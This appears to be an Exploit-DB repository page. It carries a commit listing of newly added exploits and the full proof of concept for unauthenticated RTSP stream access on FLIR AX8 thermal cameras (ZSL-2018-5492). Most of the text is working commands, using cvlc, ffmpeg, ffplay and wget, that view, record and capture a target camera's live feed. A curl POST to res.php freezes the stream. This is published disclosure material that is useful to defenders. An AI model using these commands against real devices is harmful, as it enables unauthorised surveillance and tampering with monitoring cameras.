731dd0f423
22 changes to exploits/shellcodes Snes9K 0.0.9z - Buffer Overflow (SEH) NoMachine < 5.3.27 - Remote Code Execution MaxOn ERP Software 8.x-9.x - 'nomor' SQL Injection FLIR Brickstream 3D+ - RTSP Stream Disclosure FLIR AX8 Thermal Camera 1.32.16 - RTSP Stream Disclosure CAMALEON CMS 2.4 - Cross-Site Scripting Academic Timetable Final Build 7.0a-7.0b - 'id' SQL Injection FLIR AX8 Thermal Camera 1.32.16 - Arbitrary File Disclosure FLIR Brickstream 3D+ 2.1.742.1842 - Config File Disclosure Academic Timetable Final Build 7.0b - Cross-Site Request Forgery (Add Admin) AlchemyCMS 4.1 - Cross-Site Scripting FLIR AX8 Thermal Camera 1.32.16 - Remote Code Execution College Notes Management System 1.0 - 'user' SQL Injection Advanced HRM 1.6 - Remote Code Execution Centos Web Panel 0.9.8.480 - Multiple Vulnerabilities Academic Timetable Final Build 7.0 - Information Disclosure KORA 2.7.0 - 'cid' SQL Injection
24 lines
No EOL
992 B
Text
24 lines
No EOL
992 B
Text
# Exploit Title: FLIR AX8 Thermal Camera 1.32.16 - RTSP Stream Disclosure
|
|
# Author: Gjoko 'LiquidWorm' Krstic @zeroscience
|
|
# Date: 2018-10-14
|
|
# Vendor: FLIR Systems, Inc.
|
|
# Product web page: https://www.flir.com
|
|
# Affected version: Firmware: 1.32.16, 1.17.13, OS: neco_v1.8-0-g7ffe5b3, Hardware: Flir Systems Neco Board
|
|
# Tested on: GNU/Linux 3.0.35-flir+gfd883a0 (armv7l), lighttpd/1.4.33, PHP/5.4.14
|
|
# References:
|
|
# Advisory ID: ZSL-2018-5492
|
|
# https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5492.php
|
|
|
|
# Desc: The FLIR AX8 thermal sensor camera suffers an unauthenticated and unauthorized
|
|
# live RTSP video stream access.
|
|
|
|
# PoC
|
|
|
|
$ cvlc rtsp://TARGET/mpeg4 --fullscreen
|
|
$ ffmpeg -i rtsp://TARGET/mpeg4 -b 7000k -vcodec copy -r 60 -y ./meltdown.mp4
|
|
$ ffplay rtsp://TARGET/mpeg4
|
|
$ wget http://TARGET/snapshot.jpg ; eog snapshot.jpg
|
|
|
|
# PoC - To freeze the stream:
|
|
|
|
$ curl -d "action=set&resource=.image.state.freeze.set&value=true" -X POST http://TARGET/res.php |